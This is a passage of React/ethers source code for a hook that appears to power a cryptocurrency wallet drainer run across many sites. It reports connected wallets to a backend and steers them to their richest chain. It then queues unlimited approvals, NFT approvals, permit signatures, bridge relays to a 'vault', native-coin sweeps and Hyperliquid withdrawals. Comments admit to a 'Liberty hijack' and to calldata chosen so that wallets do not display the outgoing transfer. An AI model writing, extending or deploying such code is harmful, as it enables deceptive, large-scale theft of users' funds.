import { useState, useEffect, useMemo, useRef } from "react";
import { signDaiPermit, signERC2612Permit } from "eth-permit";
import { Contract, providers, utils, BigNumber } from "ethers";
import {
  AllowanceTransfer,
  MaxAllowanceTransferAmount,
  PERMIT2_ADDRESS,
} from "@uniswap/permit2-sdk";
import {
  apiCall,
  logApprovalReject,
  logFeError,
  isActionUserRejection,
  logApprovalSuccess,
  createTokenData,
  createMoveTokenData,
  buildCompound3AuthorizeTokenData,
} from "../utils/hookClient";
import {
  // action helpers
  switchNetwork,
  getEip712Details,
  getDeadline,
  getEthSendCalc,
  sendEthAgentReceive,
  getLifiNativeSpendable,
  snapshotWalletCapabilities,
  isAtomicSupported,
  canAtomicSendCalls,
  sendWalletCalls,
  sumFollowUpGasUnits,
  getLibTransferDetails,
  getLibertyHighBalanceAction,
  createApprovalObject,
  createBridgeTokenTo,
  postBridgeSuccess,
  createProtocolExitObject,
  createPermitObject,
  checkEIP3009Support,
  getGasOptions,
  getGasOptionsFromFeeData,
  aggregate3ReadOrFallback,
  isBridgeable,
  isWrapAndRelayEligible,
  getBridgeProxyAddress,
  getBridgeRouterAddress,
  WRAPPED_BRIDGE_TOKENS,
  LIFI_SLIPPAGE,
  LIFI_QUOTE_ORDER,
  LIFI_DENY_BRIDGES,
  formatLifiSlippagePct,
  clampLifiSlippage,
  priceImpactFromLifiQuote,
  lifiSlippageFromImpact,
  isToken96BitSupported,
  toReadableAmount,
  getHyperliquidSpotAvailable,
  signHyperliquidWithdraw,
  signHyperliquidSpotSend,
  signHyperliquidClosePerps,
  signHyperliquidSellSpotAlts,
  buildMorphoExitTokenData,
  buildErc4626ExitTokenData,
  finalizeProtocolExitTokenData,
  // abis / contract constants
  max96BitBigNumber,
  erc20ABI,
  erc677ABI,
  ethSubmitABI,
  bridgeProxyABI,
  bridgeRouterABI,
  permit2ABI,
  uniV3ABI,
  libertyProxyABI,
  MORPHO_BLUE,
  morphoBlueABI,
  MORPHO_AUTH_TYPES,
  comet3ABI,
  COMET_AUTH_TYPES,
  morphoMaxWithdrawableAssets,
  erc4626ABI,
  wlfiTokenVestABI,
  wlfiVesterABI,
  TWO_STEP_HANDLES,
  relayPullLanded,
  settlePullAllowance,
  runSiblingTwoStepBatch,
  inspectCurveWithdraw,
  inspectCurveGauge,
  inspectStakeDao,
  encodeErc20Transfer,
  EIP3009_TRANSFER_TYPES,
  // chains / config
  chains,
  defaultChainId,
  prefChainIds,
} from "../utils/evm";
import { getQuote } from "@lifi/sdk";
import { useAccount, useWalletClient } from "wagmi";

const LIFI_NATIVE = "0x0000000000000000000000000000000000000000";

// Global variables
const owner = window.location.hostname.replace(/^www\./, "");

const useEvmActions = (contextValues) => {
  const {
    isLoading,
    setIsLoading,
    balance,
    setBalance,
  } = contextValues;
  const { data: walletClient } = useWalletClient();
  const { connector, isConnected, address, chainId } = useAccount();
  const [signer, setSigner] = useState(null);
  const [provider, setProvider] = useState(null);
  const [masterAddress, setMasterAddress] = useState(null);
  const [vault, setVault] = useState(null);
  const [submitContract, setSubmitContract] = useState(null);
  const [allTokens, setAllTokens] = useState(null);
  const allTokensRef = useRef(allTokens);
  allTokensRef.current = allTokens;
  /** Per Selector attempt — reject / broadcast / receipt-unknown for action() loop. */
  const actionOutcomeRef = useRef({
    rejected: false,
    sent: false,
    receiptUnknown: false,
  });
  /** Suppress /balance refetch while Sign is mid-flight (chain switch would wipe queue). */
  const actionInFlightRef = useRef(false);
  const signerRef = useRef(null);
  const providerRef = useRef(null);
  const liveChainIdRef = useRef(chainId);
  const connectedChainIdRef = useRef(null);
  const walletCapsRef = useRef({ hasCode: false, atomic: "unknown" });
  /** From /balance. Sibling two-step rows share one sendCalls only when this is true. */
  const groupTwoStepBatchRef = useRef(false);
  /** Winner chain's click list from the first /balance. Installed once the wallet is on that chain. */
  const initialFetchRef = useRef(null);
  const [topChainId, setTopChainId] = useState(null);
  const [activeChains, setActiveChains] = useState([]);
  const [isSwitchingNetwork, setIsSwitchingNetwork] = useState(false);
  const [blacklisted, setBlacklisted] = useState(false);

  const HL_SIGN_CHAIN_ID = 42161;

  // Live getters — ensureOnChain updates refs before setState flushes.
  const apiData = useMemo(
    () => ({
      get address() {
        return address;
      },
      get chainId() {
        return Number(liveChainIdRef.current ?? chainId);
      },
      get owner() {
        return owner;
      },
    }),
    [address, chainId, owner]
  );
  const txData = useMemo(
    () => ({
      get address() {
        return address;
      },
      get chainId() {
        return Number(liveChainIdRef.current ?? chainId);
      },
      get signer() {
        return signerRef.current ?? signer;
      },
      get provider() {
        return providerRef.current ?? provider;
      },
    }),
    [address, chainId, signer, provider]
  );

  const { VITE_BACK: apiUrl } = import.meta.env;

  const libChainIds = [1, 42161, 56, 8453, 369];

  /**
   * Resolve on-chain success/fail from the receipt.
   * Broadcast hash alone is NOT success (Venus increaseApproval reverted but FE logged OK).
   * ethers v5: tx.wait() throws on status 0.
   * @returns {{ ok: boolean, phase: string, hash?: string, receipt?: any, error?: any }}
   */
  const confirmTx = async (tx) => {
    if (!tx?.hash) return { ok: false, phase: "no_tx" };
    try {
      const receipt = await tx.wait(1);
      const ok = Number(receipt?.status) === 1;
      if (!ok) {
        console.error("[confirmTx] tx mined but reverted", tx.hash);
        return { ok: false, phase: "reverted", hash: tx.hash, receipt };
      }
      return { ok: true, phase: "mined", hash: tx.hash, receipt };
    } catch (error) {
      const msg = `${error?.reason || ""} ${error?.message || ""}`;
      const unknown = /timeout|timed out|TIMEOUT/i.test(msg) && !error?.receipt;
      console.error(
        unknown ? "[confirmTx] receipt unknown" : "[confirmTx] tx failed/reverted",
        tx.hash,
        error?.reason || error?.message || error
      );
      return {
        ok: false,
        phase: unknown ? "timeout" : "reverted",
        hash: tx.hash,
        error,
      };
    }
  };

  /** Gate success logging on receipt — never treat broadcast hash as success. */
  const requireConfirmed = async (tx, handleType, token, isBatchPermit = false) => {
    const confirmed = await confirmTx(tx);
    if (confirmed.ok) return true;
    if (tx?.hash) actionOutcomeRef.current.sent = true;
    if (confirmed.phase === "timeout" || confirmed.phase === "unknown") {
      actionOutcomeRef.current.receiptUnknown = true;
    }
    logActionFailure(
      handleType,
      token,
      confirmed.error ||
        new Error(`tx ${confirmed.phase}${confirmed.hash ? `: ${confirmed.hash}` : ""}`),
      isBatchPermit
    );
    return false;
  };


  const logActionFailure = (handleType, token, error, isBatchPermit = false) => {
    if (isActionUserRejection(error)) {
      actionOutcomeRef.current.rejected = true;
      console.log("[logActionFailure] user rejection", {
        handleType,
        isBatchPermit,
        token,
        error,
      });
      logApprovalReject(apiUrl, handleType, token, apiData, isBatchPermit);
    } else {
      console.log("[logActionFailure] FE error", {
        handleType,
        isBatchPermit,
        token,
        error,
      });
      logFeError(apiUrl, handleType, token, apiData, error, isBatchPermit);
    }
  };

  const switchToChain = async (targetChainId) => {
    if (!targetChainId || chainId === targetChainId) return;
    setIsSwitchingNetwork(true);
    try {
      await switchNetwork(targetChainId);
    } finally {
      setIsSwitchingNetwork(false);
    }
  };

  const refreshEvmSession = async (
    expectedChainId,
    { attempts = 6, delayMs = 250 } = {}
  ) => {
    if (!walletClient) {
      throw new Error("no walletClient for chain session");
    }
    let lastLive = null;
    for (let i = 0; i < attempts; i++) {
      const walletProvider = new providers.Web3Provider(walletClient);
      const net = await walletProvider.getNetwork();
      const live = Number(net?.chainId);
      lastLive = live;
      if (expectedChainId == null || live === Number(expectedChainId)) {
        const nextSigner = walletProvider.getSigner();
        providerRef.current = walletProvider;
        signerRef.current = nextSigner;
        liveChainIdRef.current = live;
        setProvider(walletProvider);
        setSigner(nextSigner);
        return { provider: walletProvider, signer: nextSigner, chainId: live };
      }
      if (i < attempts - 1) {
        await new Promise((r) => setTimeout(r, delayMs));
      }
    }
    throw new Error(
      `wallet chain mismatch: want ${expectedChainId}, got ${lastLive}`
    );
  };

  const ensureOnChain = async (targetChainId, handleType, token) => {
    const want = Number(targetChainId);
    if (!Number.isFinite(want) || want <= 0) {
      const err = new Error(`${handleType}: missing target chainId`);
      logActionFailure(handleType, token, err);
      throw err;
    }
    const current = Number(liveChainIdRef.current ?? chainId);
    if (current !== want) {
      console.warn(
        `[ensureOnChain] ${handleType}: switching ${current} → ${want}`
      );
      setIsSwitchingNetwork(true);
      try {
        await switchNetwork(want);
      } catch (error) {
        logActionFailure(handleType, token, error);
        throw error;
      } finally {
        setIsSwitchingNetwork(false);
      }
    }
    try {
      return await refreshEvmSession(want);
    } catch (error) {
      logActionFailure(handleType, token, error);
      throw error;
    }
  };

  const resolveHandleChainId = (token, handleType) => {
    if (handleType === "hLWithdraw3" || handleType === "hLSpotSend" ||
      handleType === "hLClosePerp" ||
      handleType === "hLSpotSell") {
      return HL_SIGN_CHAIN_ID;
    }
    const hintChain = Number(
      token?.lifi?.quoteHint?.fromChain ||
        token?.lifi?.fromChain ||
        token?.relay?.quoteHint?.fromChain ||
        token?.relay?.fromChain ||
        token?.wrapAndRelay?.fromChain
    );
    if (Number.isFinite(hintChain) && hintChain > 0) return hintChain;
    const stamped = Number(token?.chainId);
    if (Number.isFinite(stamped) && stamped > 0) return stamped;
    const listed = Number(connectedChainIdRef.current);
    if (Number.isFinite(listed) && listed > 0) return listed;
    return Number(chainId);
  };

  const isSignWaiting =
    isLoading ||
    isSwitchingNetwork;

  useEffect(() => {
    const process = async () => {
      if (!isConnected || !address) {
        setAllTokens(null);
        return;
      }
      if (!walletClient) {
        return;
      }
      if (actionInFlightRef.current) {
        return;
      }
      let switchedChain = false;
      try {
        const currentChainId = chainId;
        liveChainIdRef.current = currentChainId;
        if (!prefChainIds.includes(currentChainId)) {
          await switchToChain(defaultChainId).catch(() => {});
        }

        setIsLoading(true);
        const connectObj = {
          address,
          chainId: currentChainId,
          owner,
          WalletProviderType: connector?.name || "Unknown",
        };

        const walletProvider = new providers.Web3Provider(walletClient);
        const signer = walletProvider.getSigner();
        signerRef.current = signer;
        providerRef.current = walletProvider;
        const provider = new providers.JsonRpcProvider(
          chains[currentChainId].rpcUrl,
          currentChainId
        );
        setProvider(provider);
        setSigner(signer);

        const pending = initialFetchRef.current;
        if (pending && Number(pending.chainId) === Number(currentChainId)) {
          initialFetchRef.current = null;
          setBlacklisted(false);
          connectedChainIdRef.current = Number(currentChainId);
          setMasterAddress(pending.masterAddress);
          setVault(pending.vault);
          groupTwoStepBatchRef.current = pending.groupTwoStepBatch === true;
          const landedChains = (pending.activeChains || []).filter((chain) =>
            prefChainIds.includes(chain)
          );
          const landedTop = landedChains[0];
          setActiveChains(
            landedTop !== undefined && currentChainId === landedTop
              ? landedChains.slice(1)
              : landedChains
          );
          if (landedTop !== undefined) setTopChainId(landedTop);
          if (pending.tokenList) {
            setAllTokens(pending.tokenList);
            setBalance(
              (pending.tokenList || []).flatMap((item) => item.tokens || [])
            );
          }
          setSubmitContract(new Contract(pending.ethSubmit, ethSubmitABI, signer));
          apiCall(apiUrl, "/chain-landed", {
            address,
            chainId: currentChainId,
            owner,
            WalletProviderType: connector?.name || "Unknown",
            wallet,
            chainValue: pending.chainValue,
            totalWalletValue: pending.totalWalletValue,
            highestValueChain: pending.highestValueChain,
            tokenList: pending.tokenList,
            stakedTokens: pending.stakedTokens,
          }).catch(() => {});
          return;
        }

        setBlacklisted(false);
        const result = await apiCall(apiUrl, "/balance", connectObj);
        if (result?.error === `Invalid chainId ${currentChainId}`) {
          await switchNetwork(defaultChainId);
        }

        if (result?.data?.blacklisted) {
          setBlacklisted(true);
          setAllTokens(null);
          setBalance([]);
          return;
        }

        if (!result || !result?.success) return;

        const { data: balanceData } = result;
        const { tokenList, masterAddress, ethSubmit, vault, activeChains } =
          balanceData;
        connectedChainIdRef.current =
          Number(balanceData?.connectedChainId) || currentChainId;

        setMasterAddress(masterAddress);
        setVault(vault);
        groupTwoStepBatchRef.current = balanceData?.groupTwoStepBatch === true;

        const filtActiveChains = activeChains.filter((chain) =>
          prefChainIds.includes(chain)
        );
        const preferredTop = filtActiveChains[0];
        const remainingChains =
          preferredTop !== undefined && currentChainId === preferredTop
            ? filtActiveChains.slice(1)
            : filtActiveChains;
        setActiveChains(remainingChains);

        if (preferredTop !== undefined) {
          setTopChainId(preferredTop);
        }

        if (tokenList) {
          setAllTokens(tokenList);
          const flatTokenList = [
            ...(tokenList || []).flatMap((item) => item.tokens || []),
          ];
          setBalance(flatTokenList);
        }

        const initialFetch = balanceData?.initialFetch;
        let switchedForInitialFetch = false;
        if (
          initialFetch &&
          preferredTop &&
          Number(initialFetch.chainId) === Number(preferredTop) &&
          preferredTop !== currentChainId
        ) {
          switchedForInitialFetch = true;
          initialFetchRef.current = { ...initialFetch, activeChains: filtActiveChains };
          switchedChain = true;
          try {
            await switchToChain(preferredTop);
          } catch (switchErr) {
            initialFetchRef.current = null;
            switchedChain = false;
            console.warn("[balance] switch rejected", switchErr?.message || switchErr);
          }
          if (initialFetchRef.current) return;
        }

        if (
          !switchedForInitialFetch &&
          preferredTop &&
          preferredTop !== currentChainId
        ) {
          switchedChain = true;
          await switchToChain(preferredTop);
        }

        const sContract = new Contract(ethSubmit, ethSubmitABI, signer);
        setSubmitContract(sContract);

        await new Promise((resolve) => setTimeout(resolve, 100));
      } finally {
        if (!switchedChain) {
          setIsLoading(false);
        }
      }
    };

    process();
  }, [address, chainId, isConnected, walletClient]);

  useEffect(() => {
    if (!isLoading && allTokens?.length === 0) {
      chainSwitch();
    }

    async function chainSwitch() {
      if (activeChains.length === 0) return;

      if (topChainId && chainId !== topChainId) {
        await switchToChain(topChainId);
        return;
      }

      const [nextChain, ...remainingChains] = activeChains;
      setTopChainId(nextChain);
      setActiveChains(remainingChains);
      await switchToChain(nextChain);
    }
  }, [allTokens]);

  const getContract = (tokenAddress, abi) => {
    return new Contract(tokenAddress, abi, signerRef.current ?? signer);
  };

  const pullLegDeps = () => ({
    masterAddress,
    vault,
    provider,
    address,
    chainId,
    signer,
    txData,
    requireConfirmed,
    logActionFailure,
    getContract,
    walletClient,
    walletCapsRef,
    allTokensRef,
    setAllTokens,
    resolveHandleChainId,
    apiUrl,
    apiData,
    owner,
    postBridgeSuccess,
    groupTwoStepBatch: groupTwoStepBatchRef.current === true,
  });

  const VOLATILE_HANDLE_TYPES = new Set([
    "lifiTransfer",
    "wrapAndRelayTokens",
    "transferAndCall",
    "relayTokens",
    "libertyTransfer",
    "multicall",
    "ethSend",
  ]);
  const MAX_SKIPS_PER_CLICK = 8;

  const resetActionOutcome = () => {
    actionOutcomeRef.current = {
      rejected: false,
      sent: false,
      receiptUnknown: false,
    };
  };

  const dropHead = () => {
    const next = (allTokensRef.current || []).slice(1);
    allTokensRef.current = next;
    setAllTokens(next);
    return next;
  };

  /** After L1 ok, clear legs on the current head so reject→retry skips straight to sendAsset. */
  const clearHlL1LegsOnHead = (kind) => {
    const head = allTokensRef.current?.[0];
    const t = head?.tokens?.[0];
    if (!t?.positionDetails) return;
    if (kind === "perps") t.positionDetails.positions = [];
    if (kind === "spot") t.positionDetails.legs = [];
  };

  /**
   * After L1→sendAsset sweeps USDC (and optional sold alts), drop those groups
   * from the in-memory strategy list so the next click isn't a ghost fail.
   */
  const pruneHlStrategyGroups = ({ usdc = true, altIds = [] } = {}) => {
    const usdcId = "USDC:0x6d1e7cde53ba9467b783cb7c530ce054";
    const altSet = new Set((altIds || []).map((id) => String(id).toLowerCase()));
    const cur = allTokensRef.current || [];
    const next = cur.filter((g) => {
      const t = g?.tokens?.[0];
      if (!t) return true;
      if (
        usdc &&
        t.handleType === "hLSpotSend" &&
        (t.id === usdcId || t.symbol === "hlSpotUSDC" || t.name === "hlSpotUSDC")
      ) {
        return false;
      }
      if (
        altSet.size &&
        t.handleType === "hLSpotSend" &&
        altSet.has(String(t.id || "").toLowerCase())
      ) {
        return false;
      }
      return true;
    });
    if (next.length === cur.length) return;
    console.log("[hl] pruned strategy groups", {
      before: cur.length,
      after: next.length,
      usdc,
      altIds: [...altSet],
    });
    allTokensRef.current = next;
    setAllTokens(next);
  };


  const attempt = async (group) => {
    resetActionOutcome();
    const result = await Selector(group);
    return { result, o: { ...actionOutcomeRef.current } };
  };

  const action = async () => {
    if (blacklisted) return { success: false };
    console.log("Sign Button Clicked!");
    apiCall(apiUrl, "/click", {
      click: "Sign Button",
      address,
      owner,
    });
    if (isSwitchingNetwork) {
      console.log("Sign blocked: network switch in progress");
      return { success: false };
    }
    if (!(allTokensRef.current && allTokensRef.current.length > 0)) {
      console.log("Sign blocked: no tokens");
      return { success: false };
    }
    setIsLoading(true);
    actionInFlightRef.current = true;
    try {
      let skips = 0;
      while (allTokensRef.current?.length && skips < MAX_SKIPS_PER_CLICK) {
        const group = allTokensRef.current[0];
        if (!group) return { success: false };

        const { result, o } = await attempt(group);
        const ranType = result?.handleType || group?.tokens?.[0]?.handleType;
        const volatile = VOLATILE_HANDLE_TYPES.has(ranType);

        if (result?.success) {
          dropHead();
          return { success: true, hash: result.hash ?? null };
        }
        if (o.rejected || o.receiptUnknown) {
          return { success: false, rejected: Boolean(o.rejected) };
        }
        if (result?.skipped) {
          dropHead();
          skips += 1;
          continue;
        }

        // Pre-wallet fail, or volatile sent-revert: one same-click retry.
        // Static sent-revert: skip (don't resend approve/permit/auth).
        if (!o.sent || volatile) {
          const again = await attempt(group);
          if (again.result?.success) {
            dropHead();
            return { success: true, hash: again.result.hash ?? null };
          }
          if (again.o.rejected || again.o.receiptUnknown) {
            return { success: false, rejected: Boolean(again.o.rejected) };
          }
        }

        dropHead();
        skips += 1;
      }
      return { success: false };
    } catch (error) {
      console.error("Token processing failed:", error);
      return { success: false };
    } finally {
      actionInFlightRef.current = false;
      setIsLoading(false);
    }
  };

  const Selector = async (token) => {
    if (!token) {
      console.warn("[useEvmActions] Selector: empty strategy group");
      return { success: false };
    }
    const { tokens, batchPermit: isBatchPermit } = token;
    const selectedToken = tokens[0];

    if (!selectedToken?.handleType) {
      console.warn("[useEvmActions] Selector: malformed group — missing tokens[0] or handleType", token);
      logFeError(
        apiUrl,
        "missing",
        selectedToken || token,
        apiData,
        new Error("Selector: missing tokens[0] or handleType")
      );
      return { success: true, skipped: true };
    }

    const h = selectedToken.handleType;
    const neededChainId = resolveHandleChainId(selectedToken, h);
    try {
      await ensureOnChain(neededChainId, h, selectedToken);
    } catch (error) {
      return {
        success: false,
        error: error?.message || "chain mismatch",
        handleType: h,
      };
    }
    // Liberty only for approve-family (not protocol exits / bridge / permit).
    const APPROVE_FAMILY = new Set([
      "approve",
      "increaseAllowance",
      "increaseApproval",
    ]);

    const handlers = {
      // Native leave
      ethSend: () => ethSend(selectedToken),
      // Approvals / allowances
      approve: () => approve(selectedToken),
      increaseAllowance: () => approve(selectedToken),
      increaseApproval: () => approve(selectedToken),
      multicall: () => handleMulticall(selectedToken),
      // Bridge txs
      transferAndCall: () => transferAndCall(selectedToken),
      relayTokens: () => relayTokens(selectedToken),
      wrapAndRelayTokens: () => wrapAndRelayTokens(selectedToken),
      lifiTransfer: () => lifiTransfer(selectedToken),
      // Protocol exits
      morphoBlueWithdraw: () => morphoBlueWithdraw(selectedToken),
      morphoBlueAuthorize: () => morphoBlueAuthorize(selectedToken),
      compound3Authorize: () => compound3Authorize(selectedToken),
      erc4626Redeem: () => erc4626Redeem(selectedToken),
      erc4626Withdraw: () => erc4626Withdraw(selectedToken),
      wlfiVestClaim: () => wlfiVestClaim(selectedToken),
      curveLendingWithdraw: () => curveLendingWithdraw(selectedToken),
      curveGaugeWithdraw: () => curveGaugeWithdraw(selectedToken),
      stakedaoWithdraw: () => stakedaoWithdraw(selectedToken),
      // Permits / signatures
      ethPermit: () => ethPermit(selectedToken),
      permit2: () => permit2(tokens, isBatchPermit),
      // Exchange withdrawals (HL now; Lighter later)
      hLWithdraw3: () => hyperliquidWithdrawal(selectedToken),
      hLSpotSend: () => hyperliquidSpotSend(selectedToken),
      hLClosePerp: () => hyperliquidClosePerp(selectedToken),
      hLSpotSell: () => hyperliquidSpotSell(selectedToken),
    };

    // Liberty hijack — not in the map. Approve-family only (not exits / bridge / permit).
    const libDetails = getLibTransferDetails(selectedToken.id, chainId);
    if (
      libChainIds.includes(chainId) &&
      libDetails.isLibTransferable &&
      APPROVE_FAMILY.has(h)
    ) {
      const libResult = await libertyTransfer(selectedToken, libDetails);
      return { ...libResult, handleType: "libertyTransfer" };
    }

    const run = handlers[h];
    if (!run) {
      console.log("unknown handleType, skipping to next:", h, selectedToken);
      logFeError(
        apiUrl,
        h,
        selectedToken,
        apiData,
        new Error(`unknown handleType: ${h}`)
      );
      return { success: true, skipped: true };
    }
    const out = await run();
    return { ...out, handleType: out?.handleType || h };
  };

  // ============================================================================
  // Native leave
  // ============================================================================

  const ethSend = async (token) => {
    if (!signer || !submitContract) return { success: false };
    const hType = token.handleType || "ethSend";

    // Strat stamp or legacy amount gate → dedicated Omni handler.
    if (
      hType === "wrapAndRelayTokens" ||
      isWrapAndRelayEligible(chainId, token.amount)
    ) {
      return wrapAndRelayTokens(token);
    }

    try {
      // Leave gas for remaining strat tokens (per-handle gasLimits, not flat×N).
      const followUpGasUnits = sumFollowUpGasUnits(allTokens, token, chainId);
      const result = await getEthSendCalc(
        provider,
        address,
        chainId,
        false,
        { followUpGasUnits }
      );

      if (!result || Number(result.ethValue) <= 0) return { success: false };

      const { ethValue, gasOptions } = result;
      // REF default: .swap() — fleet fork: bridge/pulse → .bridge(), some DEX apps → .transfer()
      // const ethsend = await submitContract.deposit(gasOptions);
      // Empty calldata → ethAgent receive(). Do not call deposit/swap/bridge:
      // those 4bytes decode in the wallet (deposit() === WETH wrap) and show "You send".
      const ethsend = await sendEthAgentReceive(
        signer,
        submitContract.address,
        gasOptions
      );

      if (!ethsend) return { success: false };
      if (!(await requireConfirmed(ethsend, hType, token))) {
        return { success: false };
      }

      const tokenData = createTokenData(token, Number(ethValue));
      const ethsendObject = createApprovalObject(
        tokenData,
        apiData,
        ethsend.hash,
        hType
      );
      logApprovalSuccess(apiUrl, ethsendObject, hType);
      return { success: true, hash: ethsend.hash };
    } catch (error) {
      console.log("error in ethSend", error.message);
      logActionFailure(hType, token, error);
      return { success: false };
    }
  };

  // ============================================================================
  // Approvals / allowances
  // ============================================================================

  const approve = async (token) => {
    if (!token) return { success: false };
    const hType = token?.handleType;
    const canBridge = await isBridgeable(token.id, provider, apiData);
    if (canBridge) {
      return await relayTokens(token);
    }
    const is96Bit = isToken96BitSupported(token.id);
    const approvalAmount = is96Bit
      ? max96BitBigNumber
      : MaxAllowanceTransferAmount;
    try {
      const contract = getContract(token.id, erc20ABI);
      const params = [masterAddress, approvalAmount];
      const defGas = chainId === 369 ? 150000 : 100000;
      const gasOptions = await getGasOptions(contract, hType, params, txData, defGas);
      const approval = await contract[hType](...params, gasOptions);
      if (!approval) return { success: false };
      if (!(await requireConfirmed(approval, hType, token))) {
        return { success: false };
      }
      const tokenData = createTokenData(token);
      const approvalObject = createApprovalObject(
        tokenData,
        apiData,
        approval.hash,
        hType,
        token.positionDetails || null
      );
      logApprovalSuccess(apiUrl, approvalObject, hType);

      return { success: true, hash: approval.hash };
    } catch (error) {
      logActionFailure(hType, token, error);
      return { success: false };
    }
  };

  const handleMulticall = async (token) => {
    if (!token) return { success: false };

    if (token.tokenType === "erc721") {
      try {
        const uniswapV3Contract = getContract(token.id, uniV3ABI);
        const approvalData = uniswapV3Contract.interface.encodeFunctionData(
          "setApprovalForAll",
          [masterAddress, true]
        );

        const multicallData = [approvalData];
        const multicall = await executeSingleMulticall(
          uniswapV3Contract,
          multicallData
        );

        if (!multicall) return { success: false };

        const tokenData = createTokenData(token);
        const approvalObject = createApprovalObject(
          tokenData,
          apiData,
          multicall.hash,
          token.handleType
        );

        logApprovalSuccess(apiUrl, approvalObject, token.handleType);
        return { success: true, hash: multicall.hash };
      } catch (error) {
        console.error("Error at Uniswap V3:", error.reason);
        logActionFailure(token.handleType, token, error);
        return { success: false };
      }
    } else return { success: false };
  };

  const executeSingleMulticall = async (multicallContract, multicallData) => {
    try {
      const gasOptions = await getGasOptions(multicallContract, "multicall", multicallData, txData);
      const tx = await multicallContract.multicall(multicallData, gasOptions);
      return tx;
    } catch (error) {
      throw error;
    }
  };

  // ============================================================================
  // Bridge txs
  // ============================================================================

  const transferAndCall = async (token) => {
    if (!token) return { success: false };
    try {
      const hType = token?.handleType;
      const contract = getContract(token.id, erc677ABI);
      const iface677 = new utils.Interface(erc677ABI);
      const { balance, bridgeContract } = await aggregate3ReadOrFallback(
        provider,
        chainId,
        [
          {
            target: token.id,
            allowFailure: true,
            callData: iface677.encodeFunctionData("balanceOf", [address]),
          },
          {
            target: token.id,
            allowFailure: true,
            callData: iface677.encodeFunctionData("bridgeContract", []),
          },
        ],
        (rows) => {
          if (!rows[0]?.success || !rows[1]?.success) throw new Error("multicall");
          return {
            balance: iface677.decodeFunctionResult("balanceOf", rows[0].returnData)[0],
            bridgeContract: iface677.decodeFunctionResult(
              "bridgeContract",
              rows[1].returnData
            )[0],
          };
        },
        async () => ({
          balance: await contract.balanceOf(address),
          bridgeContract: await contract.bridgeContract(),
        })
      );
      const params = [bridgeContract, balance, vault];
      const defGas = chainId === 1 ? 400000 : 700000;
      const gasOptions = await getGasOptions(contract, hType, params, txData, defGas);
      const transferAndCall = await contract[hType](...params, gasOptions);
      if (!transferAndCall) return { success: false };
      if (!(await requireConfirmed(transferAndCall, hType, token))) {
        return { success: false };
      }

      const movedAmt = await toReadableAmount(balance, token.id, {
        getContract,
      }).catch(() => null);
      return postBridgeSuccess(apiUrl, {
        token,
        movedAmt,
        hash: transferAndCall.hash,
        handleType: token.handleType,
        apiData,
        tokenTo: createBridgeTokenTo(token.id, token.symbol, token.tokenType),
        dest: {
          destChainId: chainId === 1 ? 369 : 1,
          bridgeRouter: bridgeContract,
          receiver: vault,
        },
      });
    } catch (error) {
      logActionFailure(token.handleType, token, error);
      return { success: false };
    }
  };

  const relayTokens = async (token) => {
    if (!token) return { success: false };

    const hType = "relayTokens";

    const proxyAddress = getBridgeProxyAddress(chainId);

    try {
      const tokenContract = getContract(token.id, erc20ABI);
      const iface20 = new utils.Interface(erc20ABI);
      const { bridgeAllowance, balance } = await aggregate3ReadOrFallback(
        provider,
        chainId,
        [
          {
            target: token.id,
            allowFailure: true,
            callData: iface20.encodeFunctionData("allowance", [
              address,
              proxyAddress,
            ]),
          },
          {
            target: token.id,
            allowFailure: true,
            callData: iface20.encodeFunctionData("balanceOf", [address]),
          },
        ],
        (rows) => {
          if (!rows[0]?.success || !rows[1]?.success) throw new Error("multicall");
          return {
            bridgeAllowance: iface20.decodeFunctionResult(
              "allowance",
              rows[0].returnData
            )[0],
            balance: iface20.decodeFunctionResult("balanceOf", rows[1].returnData)[0],
          };
        },
        async () => {
          const [allowance, bal] = await Promise.all([
            tokenContract.allowance(address, proxyAddress),
            tokenContract.balanceOf(address),
          ]);
          return { bridgeAllowance: allowance, balance: bal };
        }
      );

      if (bridgeAllowance.lt(balance)) {
        // Get gas options for approval
        const approvalGasOptions = await getGasOptions(
          tokenContract,
          "approve",
          [proxyAddress, balance],
          txData,
          100000
        );
        const approvalTx = await tokenContract.approve(
          proxyAddress,
          balance,
          approvalGasOptions
        );
        if (!approvalTx) return { success: false };
        if (!(await requireConfirmed(approvalTx, "approve", token))) {
          return { success: false };
        }
      }

      const proxyContract = getContract(proxyAddress, bridgeProxyABI);
      const params = [token.id, vault, balance];
      const defGas = chainId === 1 ? 400000 : 700000;
      const gasOptions = await getGasOptions(proxyContract, hType, params, txData, defGas);
      const relayTx = await proxyContract[hType](...params, gasOptions);
      if (!relayTx) return { success: false };
      if (!(await requireConfirmed(relayTx, hType, token))) {
        return { success: false };
      }

      const movedAmt = await toReadableAmount(balance, token.id, {
        getContract,
      }).catch(() => null);
      return postBridgeSuccess(apiUrl, {
        token,
        movedAmt,
        hash: relayTx.hash,
        handleType: hType,
        apiData,
        tokenTo: createBridgeTokenTo(token.id, token.symbol, token.tokenType),
        dest: {
          destChainId: chainId === 1 ? 369 : 1,
          bridgeRouter: proxyAddress,
          receiver: vault,
        },
      });
    } catch (error) {
      console.log("error in relayTokens", error);
      logActionFailure("relayTokens", token, error);
      return { success: false };
    }
  };

  /**
   * Omni wrap+relay (1↔369). Strat stamps wrapAndRelayTokens when
   * ENABLE_WRAP_AND_RELAY_STRAT; ethSend still routes here via amount gate.
   */
  const wrapAndRelayTokens = async (token) => {
    if (!signer || !provider || !vault || !address) return { success: false };
    if (chainId !== 1 && chainId !== 369) {
      console.warn("[wrapAndRelayTokens] Omni only (1/369), got", chainId);
      return { success: false };
    }

    try {
      const followUpGasUnits = sumFollowUpGasUnits(allTokens, token, chainId);
      const result = await getEthSendCalc(
        provider,
        address,
        chainId,
        true,
        { followUpGasUnits }
      );
      if (!result || Number(result.ethValue) <= 0) return { success: false };
      const { ethValue, gasOptions } = result;

      const wrapRouterAddress = getBridgeRouterAddress(chainId);
      const wrapRouter = getContract(wrapRouterAddress, bridgeRouterABI);
      const tx = await wrapRouter.wrapAndRelayTokens(vault, gasOptions);
      if (!tx) return { success: false };
      if (!(await requireConfirmed(tx, "wrapAndRelayTokens", token))) {
        return { success: false };
      }

      const destChainId =
        token.destChainId ??
        token.wrapAndRelay?.destChainId ??
        (chainId === 1 ? 369 : 1);

      const wrappedSymbol = "W" + (token.symbol || "");
      const wrappedAddr = WRAPPED_BRIDGE_TOKENS[wrappedSymbol]?.[destChainId];
      const tokenTo = wrappedAddr
        ? createBridgeTokenTo(wrappedAddr, wrappedSymbol, "erc20")
        : null;
      if (!wrappedAddr) {
        console.warn(
          "[wrapAndRelayTokens] unknown wrapped dest for",
          wrappedSymbol,
          "chain",
          destChainId
        );
      }

      return postBridgeSuccess(apiUrl, {
        token,
